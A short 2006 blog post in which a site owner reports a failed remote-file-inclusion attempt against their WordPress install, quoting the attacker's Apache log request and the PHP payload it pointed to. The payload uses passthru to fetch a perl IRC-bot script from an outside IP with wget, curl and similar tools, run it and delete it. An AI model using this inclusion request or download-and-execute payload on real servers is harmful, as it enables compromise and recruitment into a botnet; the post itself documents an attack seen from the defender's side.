someone being bad

I noticed someone/thing trying to do something nasty to my wordpress install. Good thing nothing happened.

px.ns1.net 217.9.84.137 - - [07/Sep/2006:19:25:33 -0700] "GET //tags/tags.php?BBCodeFile=http://208.10.22.70/spread.txt? HTTP/1.1" 404 37655 "-" "libwww-perl/5.79" -/- (-%) VLOG=-

The payload of the file is.

< ?
passthru('cd /tmp;wget http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*');
passthru('cd /tmp;curl -O http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*');
passthru('cd /tmp;lwp-download http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*');
passthru('cd /tmp;lynx -source http://208.10.22.70/images/shbb.txt > shbb.txt ;perl shbb.txt;rm -f shbb.txt*');
passthru('cd /tmp;fetch http://208.10.22.70/images/shbb.txt > shbb.txt ;perl shbb.txt ;rm -f shbb.txt*');
passthru('cd /tmp;GET http://208.10.22.70/images/shbb.txt > shbb.txt ;perl shbb.txt ;rm -f shbb.txt*');
? >

The file this script is attempting to retrieve; shbb.txt is a perl script, which runs an IRC bot that connects to an IRC server in brazil.

Related posts:

  1. script kiddies go home. Yeesh, another day another set of lame attacks. This [tag]hack...
  2. wordtube? I saw something interesting in my apache log. blog.px.ns1.net 72.36.146.234...
  3. wordtube deleted. OK, over the past week+ after updating this plugin, my...
  4. Quickie Howto install the OpenID Wordpress plugin. My friend Dan Spisak was having issues with getting his...
  5. CIA currently under attack. Well as an update to that lame [tag]hack attempt[/tag] from...

This entry was written by px, posted on 2006.09.07 at 8:22 pm PDT, filed under WordPress, internet, software and tagged , , . Bookmark the permalink. Follow any comments here with the RSS feed for this post. Post a comment or leave a trackback: Trackback URL.

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*

Bad Behavior has blocked 901 access attempts in the last 7 days.